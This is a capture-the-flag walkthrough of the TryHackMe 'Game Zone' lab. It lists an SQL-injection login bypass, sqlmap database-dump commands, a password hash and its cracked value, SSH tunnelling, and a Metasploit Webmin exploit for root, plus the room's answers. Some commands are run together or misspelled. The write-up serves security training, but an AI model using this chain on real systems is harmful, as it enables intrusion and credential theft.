TryHackMe — Game Zone

3 min readMay 3, 2020

[Task 1] Deploy the vulnerable machine

#1 Deploy the machine and access its web server.

#2 What is the name of the large cartoon avatar holding a sniper on the forum?

agent 47

[Task 2] Obtain access via SQLi

#1 SQL is a standard language for storing, editing and retrieving data in databases.

#2 Lets use what we’ve learnt above, to manipulate the query and login without any legitimate credentials.

Log in : ' or 1=1 #

#3 GameZone doesn’t have an admin user in the database, however you can still login without knowing any credentials using the inputted password data we used in the previous question.

http://10.10.73.54/portal.php

When you’ve logged in, what page do you get redirected to?

portal.php

[Task 3] Using SQLMap

#1 We’re going to use SQLMap to dump the entire database for GameZone.

sqlmap -u "http://10.10.73.54/portal.php" --data="searchitem=cyberops" --dbs

sqlmap -u "http://10.10.73.54/portal.php" --data="searchitem=cyberops" -D db --tablessqlmap -u "http://10.10.73.54/portal.php" --data="searchitem=cyberops" -D db -T users --culumnssqlmap -u "http://10.10.73.54/portal.php" --data="searchitem=cyberops" -D db -T users -C username,pwd --dump

In the users table, what is the hashed password?

ab5db915fc9cea6c78df88106c6500c57f2b52901ca6c0c6218f04122c3efd14

#2 What was the username associated with the hashed password?

agent47

#3 What was the other table name?

post

[Task 4] Cracking a password with JohnTheRipper

#2 What is the de-hashed password?

echo "ab5db915fc9cea6c78df88106c6500c57f2b52901ca6c0c6218f04122c3efd14" > pwdjohn pwd --format=Raw-SHA256 --wordlist=/usr/share/wordlists/rockyou.txt

videogamer124

#3 Now you have a password and username. Try SSH’ing onto the machine.

ssh agent47@10.10.73.54

What is the user flag?

cat /home/agent47/user.txt

[Task 5] Exposing services with reverse SSH tunnels

#1 How any TCP sockets are running?

ss -tulpn

#2 We can see that a service running on port 10000 is blocked via a firewall rule from the outside (we can see this from the IPtable list). However, Using an SSH Tunnel we can expose the port to us (locally)!

ssh -L 10000:localhost:10000 agent47@10.10.73.54

http://localhost:10000/

User : agent47
Pass : videogamer124

What is the name of the exposed CMS?

webmin

#3 What is the CMS version?

1.580

[Task 6] Privilege Escalation with Metasploit

msfconsole

use exploit/unix/webapp/webmin_show_cgi_exec
set RHOSTS localhost
set USERNAME agent47
set PASSWORD videogamer124
set SSL false
exploit

python -c ‘import pty; pty.spawn(“/bin/bash”)’

#1 What is the root flag?

cat /root/root.txt